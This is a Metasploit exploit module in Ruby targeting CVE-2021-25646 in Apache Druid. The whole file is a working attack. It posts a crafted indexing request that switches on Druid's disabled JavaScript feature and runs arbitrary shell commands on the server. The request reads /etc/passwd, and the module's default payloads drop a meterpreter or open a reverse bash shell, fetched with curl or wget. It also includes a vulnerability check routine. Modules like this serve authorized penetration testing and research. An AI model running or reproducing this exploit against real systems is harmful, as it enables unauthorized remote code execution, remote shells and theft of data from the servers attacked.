## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Apache Druid 0.20.0 Remote Command Execution', 'Description' => %q{ Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests; however, that feature is disabled by default. In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request that both enables the JavaScript code-execution feature and executes the supplied code all at once, allowing for code execution on the server with the privileges of the Druid Server process. More critically, authentication is not enabled in Apache Druid by default. Tested on the following Apache Druid versions: * 0.15.1 * 0.16.0-iap8 * 0.17.1 * 0.18.0-iap3 * 0.19.0-iap7 * 0.20.0-iap4.1 * 0.20.0 * 0.21.0-iap3 }, 'Author' => [ 'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery 'je5442804' # Metasploit module ], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'References' => [ ['CVE', '2021-25646'], ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'], ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'], ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py'] ], 'DisclosureDate' => '2021-01-21', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Targets' => [ [ 'Linux (dropper)', { 'Platform' => 'linux', 'Type' => :linux_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl' }, 'CmdStagerFlavor' => %w[curl wget], 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Unix (in-memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], ], 'DefaultTarget' => 0, 'Privileged' => false, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ Opt::RPORT(8888), OptString.new('TARGETURI', [true, 'The base path of Apache Druid', '/']) ]) end def execute_command(cmd, _opts = {}) gencmd = '/bin/sh`@~-c`@~' + cmd genvar = Rex::Text.rand_text_alpha(8..12) genname = Rex::Text.rand_text_alpha(8..12) vprint_status("cmd= #{gencmd} var=#{genvar} name=#{genname}") post_data = { type: 'index', spec: { ioConfig: { type: 'index', firehose: { type: 'local', baseDir: '/etc', filter: 'passwd' } }, dataSchema: { dataSource: Rex::Text.rand_text_alpha(8..12), parser: { parseSpec: { format: 'javascript', timestampSpec: {}, dimensionsSpec: {}, function: "function(){var #{genvar} = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"#{rand(1..9999999)}\",#{genname}: #{genvar}}}", "": { enabled: 'true' } } } } }, samplerConfig: { numRows: 10 } }.to_json send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/druid/indexer/v1/sampler'), 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json, text/plain, */*' }, 'data' => post_data }) end def check genecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a') vprint_status("Attempting to execute 'echo #{genecho}' on the target.") res = execute_command("echo #{genecho}") unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 return CheckCode::Safe end if res.body.include?(genecho) return CheckCode::Vulnerable end CheckCode::Unknown('Target does not seem to be running Apache Druid.') end def exploit case target['Type'] when :linux_dropper execute_cmdstager when :unix_memory execute_command(payload.encoded) end end end